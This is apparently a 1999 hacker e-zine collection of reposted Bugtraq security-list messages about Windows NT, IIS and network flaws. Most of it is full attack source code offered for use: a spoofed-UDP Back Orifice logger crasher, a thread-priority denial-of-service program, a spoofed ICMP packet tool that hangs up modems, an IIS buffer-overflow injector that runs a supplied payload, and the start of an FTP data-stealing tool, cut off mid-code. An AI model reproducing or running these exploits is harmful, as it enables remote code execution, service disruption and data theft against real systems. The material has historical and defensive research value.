______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
Revision History
June 16, 1999: Initial release
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCUAwUBN2gDVnVP+x0t4w7BAQE5EwP1GxYDqIPNlqd1SzIRlgS/k8ir75NIWEly
+N4QqpEjR/1xWzBiro2Z94ZXD8GTugkkjxsyQgOdzMe3iWj8apbrokA6aRfOJ+4B
lth2LgpurSU8TDmuo+miSBnS7joWaLzD6q/IAfYFb5wE890Lrale27uJVq+adqB+
+U3S1Pga2Q==
=iOIZ
-----END PGP SIGNATURE-----
--------------------------------------------------------------------------------
Date: Mon, 21 Jun 1999 12:23:27 +0300
From: Mikko Hypponen
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Alert: Microsoft Security Bulletin (MS99-019) - IIS Fix Available
Russ:
>Microsoft have released a patch for IIS 4.0 which addresses the issues
>uncovered by eEye.
Also, if you want to monitor who's running IISHACK in your organisation,
we've added detection of this tool (as a trojan horse) into latest updates
for F-Secure Anti-Virus. This detects the original IISHACK.EXE as released
by eEye with the name "Trojan.IIS_Hack".
For more information, see our Virus News Updates at:
http://www.datafellows.com/news/vir-news/
--
Mikko Hermanni Hyppönen, Mikko.Hypponen@DataFellows.com
Manager, Anti-Virus Research, Data Fellows Corp.
Integrated Solutions for Enterprise Security
Tel +358 9 8599 0513 - fax +358 9 8599 0713
http://www.DataFellows.com/staff/hermanni/
@HWA
112.0 BO server flooder sends random spoofed udp's to the attacker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/**************************************/
/* Back orifice server flooder */
/* Send random spoofed udp bo packet */
/* to some lame logger */
/* This code crash with just 5 packet */
/* the old fakebo and the real one */
/* The lasted just need more packet */
/* to crash ;) */
/* Another code from Bong */
/* bong26@hotmail.com */
/**************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
#define err(x) { fprintf(stderr, x); exit(1); }
int i;
char data[] = {
0xCE, 0x63, 0xD1, 0xD2, 0x16,
0xE7, 0x13, 0xCF, 0x3D, 0xA5,
0xA5, 0x86, 0xB2, 0x75, 0x4B,
0x99, 0x9F, 0x18, 0x58, 0x86,
0x89, 0x99};
void brek(int no){
printf("\nStoped\n%d packet sended!\n",i);
exit(1);
}
int sendpkt_udp (sin, sock, data, len, src, dst, sport, dport)
struct sockaddr_in *sin;
unsigned short int sock, len, sport, dport;
unsigned long int src, dst;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];
char crashme[500];
ip.ihl = 5;
ip.version = 4;
ip.tos = rand () % 100;;
ip.tot_len = htons (28 + len);
ip.id = htons (31337 + (rand () % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = src;
ip.daddr = dst;
udp.source = htons (sport);
udp.dest = htons (dport);
udp.len = htons (8 + len);
udp.check = (short) 0;
memcpy (packet, (char *) &ip, sizeof (ip));
memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, len);
memcpy (packet + sizeof (ip) + sizeof (udp) + len, crashme, 500);
return sendto (sock, packet, sizeof (ip) + sizeof (udp) + len + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in));
}
unsigned int lookup (char *host)
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1){
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));}
return (addr);
}
void main (int argc, char **argv)
{
unsigned int src,dst;
char *tmpsrc;
struct sockaddr_in sin;
struct hostent *hep;
long wait=25000;
int sock,dstP,srcP=113,nb=1,mod,a,b,c,d;
signal(SIGINT, brek);
if (argc < 3){
printf("\nBo logger flooder by Bong\n");
printf ("Usage: %s [source] [numb]\n",argv[0]);
printf("Mode 1: one source\n");
printf("Mode 2: random source\n\n");
exit(1);}
if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err("Unable to open raw socket.\n");
mod=atoi(argv[1]);
if (mod==1){
if (argc < 4) printf("Need at least 3 argument");
if (!(src = lookup (argv[2])))
err ("Unable to lookup address.\n");
if (!(dst = lookup (argv[3])))
err ("Unable to lookup address.\n");
tmpsrc=(argv[3]);
if(argv[4]){ nb = atoi(argv[4]);}
}else{
if (!(dst = lookup (argv[2])))
err("Unable to lookup address..\n");
tmpsrc=(argv[2]);
if(argv[3]){ nb = atoi(argv[3]);}
}
sin.sin_family = AF_INET;
sin.sin_port = 31337;
sin.sin_addr.s_addr = dst;
printf("Flood %s with mode %d and %d packet\n",tmpsrc,mod,nb);
for(i=0; i < nb; i++){
if (mod==2){
srandom((time(0)+i));
srcP = getrandom(1,1500)+1000;
a = getrandom(0, 255);
b = getrandom(0, 255);
c = getrandom(0, 255);
d = getrandom(0, 255);
sprintf(tmpsrc, "%i.%i.%i.%i", a, b, c, d);
hep=gethostbyname(tmpsrc);
src= *(unsigned long *)hep->h_addr;}
if ((sendpkt_udp (&sin, sock, &data,sizeof(data),src,dst,srcP,31337)) == -1)
err ("Error sending the UDP packet.\n");}
printf("\n%d Packet sended!\n",i);
}
@HWA
113.0 frootcake.c revisited
~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 9 Jun 1999 23:46:05 +1000
From: kiva
To: BUGTRAQ@netspace.org
Subject: ordinary users bringing NT to its knees [repost]
[Aleph, sorry about my original post - I pasted the wrong code! oops! :) ]
Hi,
sorry if problems like this are known, but I thought I'd post this just
incase...
I was curious at how well NT could handle *lots* of threads, so I wrote the
following. It basically locks up the system with an inability to kill the
process because (I) never get the task manager up. Pretty bad since an
ordinary user can run it :/
my system: 2xPPro with NT4 (SP5), 128megs RAM.
cheers
----------------------------
/*
* frootcake.c
* kiva@wookey.org
*
* this tests NT at coping with *really dodgy* code...
* it totally brings my SMP box to being unusable (SP5)
*/
#include
#include
void poobah();
DWORD WINAPI thread_func (LPVOID lpv)
{
DWORD id;
HANDLE h;
BOOL success = 1;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
while (success){
switch (GetThreadPriority (h)){
case THREAD_PRIORITY_ABOVE_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_BELOW_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_HIGHEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_IDLE:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_LOWEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
}
}
poobah();
return 0;
}
void poobah()
{
DWORD id;
HANDLE h;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
poobah();
}
int main ()
{
printf ("frootcake - kiva@wookey.org\n");
poobah();
return 0;
}
/* eof */
--------------------------------------------------------------------------------
Date: Thu, 10 Jun 1999 12:34:23 -0700
From: David Schwartz
To: BUGTRAQ@netspace.org
Subject: Re: ordinary users bringing NT to its knees [repost]
This is just an exploit for the 'neverending quantum' bug that's been known
for ages. See http://www.sysinternals.com/tips.htm#NEQuantum It has nothing
to do with the number of threads running (except that you need at least one
per CPU).
The bug occurs when a thread changes its priority. NT changes the thread's
priority, but also gives it a new execution quantum. By repeating this
process, a single thread can monopolize a CPU.
DS
--------------------------------------------------------------------------------
Never-ending Quantum?
In NT, as with most time-sharing operating systems, threads run in turns called
quantums. Normally, a thread executes until its quantum runs out. The next time
it is scheduled it starts with a full quantum. However, in NT a thread also gets
its quantum refreshed every time its thread or process priority is set. This
means that a thread can reset its quantum by calling SetThreadPriority (without
changing its priority) before its turn runs out. If it continues to do this it
will effectively have an infinite quantum. Why does NT do this? Its not clear,
but it appears to be a bug.
@HWA
114.0 gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ www.rootshell.com ]
From jpester@engr.csulb.edu Sun Jun 6 22:09:57 1999
Date: Sun, 6 Jun 1999 22:05:49 -0700 (PDT)
From: Jonathan Pester
To: submission@rootshell.com
Subject: 'new' DoS
Hey kids, amputee here...
Pointed out to me recently was a 'new' DoS if you can call it that..I'm
sure lots of people have thought of doing this, but I haven't seen or
heard of anythingl ike it yet. So here goes, as usual a code to test the
exploit is attached below, now for a long boring technical explanation
(script kiddiez, skip to the code now)
[ explanation ]
The way the exploit works is it hides escape/control sequences in a ICMP
echo_request packet (it contains the string +++ATH0) the +++ sends the
modem into escape mode (and if the guard time on the modem is set
ridiculously low) it will go into command mode and you can issue it an
ATH0 to hang up. It works on the reply, because it receives the
echo_request packet, then duplicates the packet with a new timestamp and
checksum, dest/source hosts and returns it to the sender, when it returns
it the string is sent to the modem, and thus hanging it up. There are a
few conditions that must be met for it to work (if you dont want to be
vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to
reply to one if it gets one
2) target computer must be using a modem (you can't hangup DS3s, although
i suppose you could hangup telco return connections..if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set
ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't i guess
you can use your own address, but then the target knows where it came
from)
In my experimenting, I have also devised various fun ways to use this
program other than just nuking your buddy off IRC. In theory..it is
possible to modify the program to do fun stuff like make the target call
some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the
modem hangup, pause for 6 seconds then call 5551212..this is fun for
obvious reasons. Then the next variation I came up with is a smurf like
implementation in which you could make a script to DoS a class C subnet,
with the number of your least favorite company, since most company's have
800 numbers, not only does this cause chaos to the phone bank, but also
costs ~$.30 per call...but i don't condone any of those ideas of course,
this is just for experimental/educational purposes only, if you fix your
modems, none of this is possible, so get off your ass and fix it.
script kiddiez: here is your code...
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---
/*
* gin.c [ fuck the soda nukers, im no kiddie ]
*
* [ http://www.rootshell.com/ ]
*
* [ sarcastic program description here ]
* pff, hey kiddiez! this program sends mad packets to some foo from
* every broadcast address on earth, mad leet yo...
* (you really wanna know what it does? LEARN TO CODE! and stop being a
* gayass fuckin script kiddie)
*
* Author: amputee (amputee@fack.net)
* Compiled on:
* Linux 2.2.9 i586 (GNU/Debian 2.2 development version)
* egcs-2.91.66
*
* [ time for greets, and fuck yous ]
*
* [ Greets (in no logical order) ]
* scummy, fobia (come back foo), ignitor, stalin, bigs, rotafer, statix
* silencers, blackang|, porp, the rest of #shutdown, soldier, klepto,
* drastic, the other #havok OGs and #eof, governor, cry0mance, gixerboy,
* protocol-, broknbonz, abalution, and anyone else i forgot that isn't
* in my fuck you list...
*
* [ Fuck yous ]
* spawn66x1 <--hahah, nucleoid (aka dynamo, emulate, microbe, immune,
* logistic ) you annoy me you stupid fuck, all authorities at PVPHS
* (my old high school) i wish cancer upon you. madcrew, you are gay
* and, anyone else who isnt in my greets list =]
*
* [ disclaimer ]
* i really dont see how i could get in trouble for this stupid program
* its really not that great, but the legal system is gay these days,
* so...this program is for educational purposes only, and the author
* holds no liability for the actions of the people that use it, that
* includes dwarfs, cyclopses, albinos, and anyone else who may happen
* to use my program. dont modify or rip on this shit, suck me
* -- amp
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "foo"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
banner();
( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
printf( "cannot resolve source host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
printf( "cannot resolve destination host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, you must be root!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d\n", numpackets );
printf( "Have some gin sucka" );
for( i = 0; i < numpackets; i++ )
gin( sockfd, sin, din );
printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1
)
? 's' : ( char )NULL );
return 0;
}
void usage( char *name )
{
printf( "usage: %s \n[ http://www.rootshell.com/ ] \n\n", name
);
exit( 0 );
}
void banner( void )
{
printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );
printf( "compiled for: %s\n\n", FRIEND );
}
char *get_progname( char *fullname )
{
char *retval = strrchr( fullname, '/' );
return retval ? ++retval : fullname;
}
void done( int foo )
{
puts( "Exiting...\n" );
exit( 1 );
}
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )
{
char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
char *packet;
int total;
struct iphdr *ip;
struct icmphdr *icmp;
size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr );
size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct
timeval );
int len = strlen( ginstring );
packet = ( char * )malloc( iphlen + icplen + len );
ip = ( struct iphdr * )packet;
icmp = ( struct icmphdr * )( packet + iphlen );
( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen
)],
( struct timezone * )NULL );
memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 )
);
ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = din.sin_addr.s_addr;
ip->check = in_chksum( ( u_short * )ip, iphlen );
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 )
) );
total = ( iphlen + icplen + timlen + len + 16 );
sendto( port, packet, total, 0,
( struct sockaddr * )&din, sizeof( struct sockaddr ) );
free( packet );
}
// stolen from smurf
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
register int nleft = iplen;
register int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *ipbuf++;
nleft -= 2;
}
if( nleft == 1 )
{
*( u_char * )( &answer ) = *( u_char * )ipbuf;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum + 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---
Also note: some machines seg fault when they run this, and setting the
environment variable MALLOC_CHECK_ to 1 seems to solve this. And..this
code will probably come out all offset and break when you try to compile
it...so just fix it, it compiles fine (i use g++ -O3 -o gin gin.c).
amp
@HWA
115.0 IIS Remote Exploit (injection code)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 16 Jun 1999 08:58:05 -0700
From: Greg Hoglund
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IIS Remote Exploit (injection code)
I read yesturday on eEye.com that they had discovered a buffer overflow in
IIS. I could not resist writing an exploit. I did not have time to design
a really cool payload for this exploit, so I simply wrote the injection
code. However, this is meaningful for several reasons. Attached is the
injection code. The exploit will deliver any payload of your choosing.
Your payload will be executed. This empowers you to create a "collection"
of payloads that are not dependant upon the injection vector in any way.
This decoupling is important for military needs, where a single injection
vector needs to work, but the "warhead" may be different depending on the
targets characterization.
The exploit was fairly simple to build. In short, I read on eEye.com that
they had overflowed IIS with something like a ~3000 character URL. Within
minutes I had caused IIS to crash with EIP under my control. I used a
special pattern in the buffer (see code) to make it easy for me to identify
where EIP was being popped from. The pattern also made it easy to
determine where I was jumping around. Use the tekneek Danielson. ;-)
So, I controlled EIP, but I needed to get back to my stack segment, of
course. This is old school, and I really lucked out. Pushed down two
levels on the stack was an address for my buffer. I couldn't have asked
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to. It had two pop's followed by a return. This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer. So, I landed in a weird place, had to add a near
jump to get to somewhere more useful.. nothing special, and here we are
with about 2K of payload space. If you don't supply any mobile code to be
run, the injection vector will supply some for you. The default payload in
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...
It's easy to play with if you want to build your own payloads.. just keep a
debugger attached to inetinfo.exe on the target machine.
Lastly, I would simply like to point out that monoculture installations are
very dangerous. It's a concept from agribusiness.. if you have all one
crop, and a virus comes along that can kill that crop, your out of
business. With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture. And, it's not just IIS. The
backbone of the Internet is built on common router technology (such as
cisco IOS). If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?
<--- snip
// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a numnber of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include
#include
#include
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
if(argc < 2)
{
fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
"http://www.rootkit.com\nUsage: %s \n", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2,0), &wsaData);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(80);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char theSploit[4096];
// fill pattern
char kick = 'z'; //0x7a
char place = 'A';
// my uber sweet pattern gener@t0r
for(int i=0;i<4096;i+=4)
{
theSploit[i] = kick;
theSploit[i+1] = place;
theSploit[i+2] = place + 1;
theSploit[i+3] = place + 2;
if(++place == 'Y') // beyond 'XYZ'
{
place = 'A';
if(--kick < 'a') kick = 'a';
}
}
_snprintf(theSploit, 5, "get /");
_snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");
// after crash, looks like inetinfo.exe is jumping to the address
// stored @ location 'GHtG' (0x47744847)
// cross reference back to the buffer pattern, looks like we need
// to store our EIP into theSploit[598]
// magic eip into NTDLL.DLL
theSploit[598] = (char)0xF0;
theSploit[599] = (char)0x8C;
theSploit[600] = (char)0xF8;
theSploit[601] = (char)0x77;
// code I want to execute
// will jump foward over the
// embedded eip, taking us
// directly to the payload
theSploit[594] = (char)0x90; //nop
theSploit[595] = (char)0xEB; //jmp
theSploit[596] = (char)0x35; //
theSploit[597] = (char)0x90; //nop
// the payload. This code is executed remotely.
// if no payload is supplied on stdin, then this default
// payload is used. int 3 is the debug interrupt and
// will cause your debugger to "breakpoint" gracefully.
// upon examiniation you will find that you are sitting
// directly in this code-payload.
if(argc < 3)
{
theSploit[650] = (char) 0x90; //nop
theSploit[651] = (char) 0x90; //nop
theSploit[652] = (char) 0x90; //nop
theSploit[653] = (char) 0x90; //nop
theSploit[654] = (char) 0xCC; //int 3
theSploit[655] = (char) 0xCC; //int 3
theSploit[656] = (char) 0xCC; //int 3
theSploit[657] = (char) 0xCC; //int 3
theSploit[658] = (char) 0x90; //nop
theSploit[659] = (char) 0x90; //nop
theSploit[660] = (char) 0x90; //nop
theSploit[661] = (char) 0x90; //nop
}
else
{
// send the user-supplied payload from
// a file. Yes, that's a 2K buffer for
// mobile code. Yes, that's big.
FILE *in_file;
in_file = fopen(argv[2], "rb");
if(in_file)
{
int offset = 650;
while( (!feof(in_file)) && (offset < 3000))
{
theSploit[offset++] = fgetc(in_file);
}
fclose(in_file);
}
}
send(s, theSploit, strlen(theSploit), 0);
}
closesocket(s);
}
}
@HWA
116.0 ActiveX security revisited
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 9 Jun 1999 12:22:00 +0100
>From: "Steve Loughran"
Subject: ActiveX Security Revisited
The latest Microsoft security bulletin
http://www.microsoft.com/security/bulletins/ms99-018.asp ) includes two
Internet Explorer patches. The first is a classic stack overrun -a web page
can supply an icon for use when adding to the favourite links list, and a
malformed icon could overrun the stack and so execute arbitrary code.
The second fault is a security hole in ActiveX control, and is a simple
instantiation of the problem covered in RISKS-18.85 and RISKS-18.86,
namely than code signing is a far less safe method of software distribution
than a 'sandbox' for untrusted code.
It so happens that one of the ActiveX controls dating from IE3 can be used
to test for the presence or absence of files on a hard disk, and while no
access to the contents is granted, it can be used to build up a picture of
what applications are installed. My demonstration page
http://www.iseran.com/ActiveX/filesearch.html ) shows a naive script
looking for common windows files in well known places -it could just as
easily look for well known applications as a preamble to an application
specific attack.
The insecure 'Preloader' control has some interesting properties. Firstly,
it is signed by Microsoft, showing that even the inventors of ActiveX and
the entire Win32 API did not test their controls rigorously enough.
Secondly, some distributions of Internet Explorer may have automatically
installed the control, in which case the control download or signature
verification process is bypassed.
It so happens that the default security settings of the Outlook and Outlook
Express e-mail messages, which means anyone could send a web page
referencing the control to any known recipient and stand a moderate chance
of being able to enumerate some disk files, possibly with no visible
notification to the recipient. This strikes me as a more serious problem
than the risk incurred by looking at random web pages, as it enables attacks
targeted at individual recipients.
Within four weeks of notifying Microsoft via their security e-mail alias the
company announced the problem, and withdrew the control from their own web
site, which seems a reasonable response time. Of course, if ActiveX had
included a mechanism whereby the signer of a control could retroactively
revoke that control then it would have been trivial to disable the control
remotely. Instead the company had to patch IE to permanently disable the
control. Few other companies would have this luxury.
While enabling or disabling ActiveX use for web site access is entirely a
matter of preference, I would personally recommend that all users of
Microsoft e-mail applications alter their e-mail client security settings so
that neither ActiveX or scripting language is supported in incoming messages
. This can be done by setting the e-mail security zone to 'restricted'.
-Steve
-----------------------------------------------------------------------------
The ActiveX Hard Disk Explorer
The ActiveX Hard Disk Explorer
This page uses the ability of the preloader control to report the presence or absence
of a file or url to a controlling script. It loops through a number of "Well
known" files to determine information about the user's system. This information could
be fed back to a web server for marketing reasons, or used to test for the presence of
other security weaknesses which could be exploited.
The example script is not very smart and does not use the results of initial tests to
determine further directions of investigation. For example, even if the absence of the
file c:\boot.ini reliably indicates there is no version of NT installed, the script still
looks for the OS in common locations. The results of individual tests are stored, and
could be used for better searching, or could be fed back to a server with ease.
Examining the source shows how this is could be accomplished. Oh, and
if you mail this to someone who uses Outlook to read their mail, guess
what happens when they get it? Recipients will have to be grateful this
file search is not done after a page load, and that the results are not
sent back to the server.
June 1999: Within a few weeks of notifying Microsoft the
errant control has been removed from their site, although there is
nothing to stop mischevious web site authors from serving the control
locally, as is done here. A patch to IE actually disables the control
for good.
ActiveX not found or enabled; no security risk demonstrable
[back ]
[home ]
[copyright ]
[software ]
@HWA
117.0 denial of service attack against NT PDC from Win95 workstation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 4 Jun 1999 14:01:01 -0700
Reply-To: Carl Byington
Sender: Windows NT BugTraq Mailing List
From: Carl Byington
Subject: denial of service attack against NT PDC from Win95 workstation
-----BEGIN PGP SIGNED MESSAGE-----
I searched the archives, but did not find this one discussed.
We have an NT PDC and a bunch of Win95 workstations. The NT domain name is
AAA and the PDC netbios machine name is BBB. Normally, the Win95
workstations are configured to logon to the NT domain, and with the
identification tab set to workgroup=AAA. This works nicely.
However, we misconfigured a Win95 box with workgroup=BBB. No symptoms were
evident until the server was rebooted after a power failure (properly
handled by an APC UPS). We then got the 'BBB is not a valid computer name'
which caused the workstation service to fail to start, and that in turn
prevented a bunch of other stuff from starting. The event log entry pointed
to the IP address of the PDC as being responsible for trying to add the
conflicting name BBB.
We could manually start the affected services, starting with the
workstation service. At that point, things seemed to be more or less
normal, but user manager for domains had problems opening the user list.
These symptoms seemed to be similar to those listed in MS article Q166184,
but we don't have RAS installed on that machine, and we don't have any
static WINS entries. However, we did not scroll thru the full list of
workstations in the WINS database, or we would have seen the Win95
workstation that had registered the name BBB.
At this point, we deleted the entire WINS database and rebooted the server.
Things worked normally until that workstation again registered its name as
BBB, but this time the event log pointed to the workstation IP so we could
finally track it down.
The server is running NT4, SP3.
-----BEGIN PGP SIGNATURE-----
Version: 4.5
iQCVAgUBN1g+hdZjPoeWO7BhAQFtoAQAqEkBc/RfrRuIyddbQRZ+gJxHYnflk0NU
pAv+vx9vbI/qAVzdPH2anLMyb4Sci042Tix9bsRCHIB3V6f8qqBgaOSpJjzZEn8z
OmY+sxlgnuC6yO4c2VWXJTh4OGq6HS0wjhPdQKfKHvYe5BvePeJ6+S8gl5BuG5lO
pV33Ftg1JRU=
=Dt/i
-----END PGP SIGNATURE-----
PGP key available from the key servers.
Key fingerprint 95 F4 D3 94 66 BA 92 4E 06 1E 95 F8 74 A8 2F A0
http://www.five-ten-sg.com
@HWA
118.0 Microsoft win2k PASV vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 15 Jun 1999 10:39:34 -0700
From: Greg Hoglund
To: BUGTRAQ@netspace.org
Subject: Microsoft win2k PASV vulnerability
Many people are aware of an old vulnerability with FTP servers. The
problem is related to not authenticating the source address of PASV port
connections. To add insult to injury, many FTP servers also open these
ports in sequential order. Now, I would expect that many of the older
installations out on the 'Net would be vulnerable. However, I would not
expect the latest Beta release of Microsoft Windows 2000 server to have
this vulnerability. Come on people!
After discovering this problem on my W2k installation, I tested it against
ftp.microsoft.com. No surprises.. their public ftp server is vulnerable
also. Now, using FTP w/o SSH in the first place is a bad idea. However, I
still think that this vulnerability is easy to fix and of all things it
shouldn't present in win2k. My wu-ftp install doesn't have this problem.
I dug around around on the net to see if anyone had written a script for
this. I found "pizzathief" for solaris. I re-wrote the program for NT and
added some features. The source code for "PizzaThief32" is posted below.
<--- snip
/*
* PizzaThief32 Exploit written by Greg Hoglund
*
* Special thanks to Jeffrey R. Gerber for thinking of such a cool name
* and to Bret McDanel for writing pizzathief for solaris!
*
* A common problem with FTP servers around the world results from
* "passive mode". A client will issue the PASV command and the
* server will in turn open a local port and wait for the client to
* connect. Once the client connects, the server will transmit the
* file or directory listing or whatever big chunk of data the client
* wanted. The crux of the problem is that many FTP servers do not
* check the source address of the connecting client. Hence, if the
* men in black manage to connect to that port before you do, you lose
* your file to someone else! And if this problem wasn't old as mold
* already, Microsoft's Windows 2000 FTP server (version 5.0 I think)
* has the problem. In fact, so does Microsoft's *public* FTP site!
* And the icing on the cake is many FTP servers open PASV ports in
* sequential order making the guesswork easy.
*
* This 'sploit runs under Windows NT and uses nonblocking i/o to snag
* as much data as possible. The code is cleaned up a bit, and the
* tool will now snag connections in a cycle.
*/
#include
#include
#include
#define NUMSOCK 64
#define FLAG_VERBOSE (0x1 << 1)
#define FLAG_STDOUT (0x1 << 2)
int connserver(char *host,int port);
int netgets(char *buff, int len, int sd);
void dumpdata(int theSocket, struct in_addr ip, unsigned short port);
int pizzaman32(struct in_addr ip, unsigned short port);
unsigned long gFlags = 0;
unsigned long gTimeout = 5000;
main(int argc, char **argv)
{
int sd, count;
struct in_addr ip;
char buff[1024],*ptr1;
unsigned short int port;
WSADATA wsaData;
if(0 != WSAStartup(MAKEWORD(2,0), &wsaData))
{
WSACleanup();
fprintf(stderr, "Could not load winsock DLL\n");
exit(0);
}
if(argc < 2)
{
fprintf(stderr, "Pizzathief32 for NT!\nFrom the Law Offices of Hoglund, " \
"McDanel, & Gerber\nUsage: %s [-v -tTimeout -s] " \
"\n options: -v Verbose\n " \
"-t timeout in ms\n -s dump to stdout\n",argv[0]);
exit(0);
}
count = 0;
while(argv[++count][0] == '-'){
switch(argv[count][1]){
case 'v':
gFlags |= FLAG_VERBOSE;
break;
case 't':
if(isdigit(argv[count][2]))
gTimeout = atoi(&argv[count][2]);
break;
case 's':
gFlags |= FLAG_STDOUT;
break;
default:
break;
